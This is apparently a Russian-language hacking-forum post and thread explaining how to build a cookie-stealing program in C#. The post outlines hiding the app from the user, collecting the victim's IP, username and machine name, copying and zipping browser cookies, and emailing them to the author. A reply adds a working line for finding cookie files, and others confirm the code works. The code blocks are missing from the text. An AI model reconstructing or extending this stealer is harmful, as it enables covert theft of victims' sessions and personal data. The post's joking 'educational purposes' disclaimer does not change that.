Привет, всем. СКАЖУ СРАЗУ ЭТО СТАТЬЯ НЕ СКОПИРОВАНА. Я вам расскажу как написать ****** на языке C# Если вы после этой статьи захотите использовать и распространять ВРЕДОНОСНОЕ ПО. Но помните про 273 статью:) и срок до семи лет) (всё в ознакомительных целях ) Итак, начнём Cперва нам нужно создать консольное приложение .NET Framework 4.5 . Затем в nuget нам нужно добавить пакет DotNetZip , я пропускаю этап установки , чтобы не затягивать. (можете в инете поискать как это делается) Для начала нам нужно подключить нужные на библиотеки > Далее нам нужно скрыть это приложение от пользователя делается это так > Чтобы узнать ip , имя пользователя и имя машины . Мы будем использовать этот код > Этот код записывает данные (ip ,имя пользователя , имя машины ) в txt. Приступаем к куки) указываем пути к куки > Дальше создаём папку куда будим копировать куки > Копируем их в эту папку > Теперь половина пути позади. Нам нужно архивировать всё что есть в папке, это делается так > Нам остаётся только отправить это всё к себе на почту > Вот и статья подходит к концу. ---------------------------------------------------------------------------------------------------- ПOKA
Слишком криво реализован поиск куков, проще так: Directory.GetFiles(Enviroment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Cookies", SearchOption.AllDirectories);
anefe, на лолзе я не нашёл рабочих ******ов (C#) , по этому я написал свой. Это ****** создан для доработки в дальнейшем, и я не идиот чтобы в сеть сливать исходники ахуенного ******а.
Оформил бы как нибудь по аккуратнее Хотя бы так Код Хотя бы так Код сам по себе страшный, но рабочий.
uraboros_inactive924849, Пока что удалил пару повторяющихся строк и добавил в тексте сообщения время, логин и айпи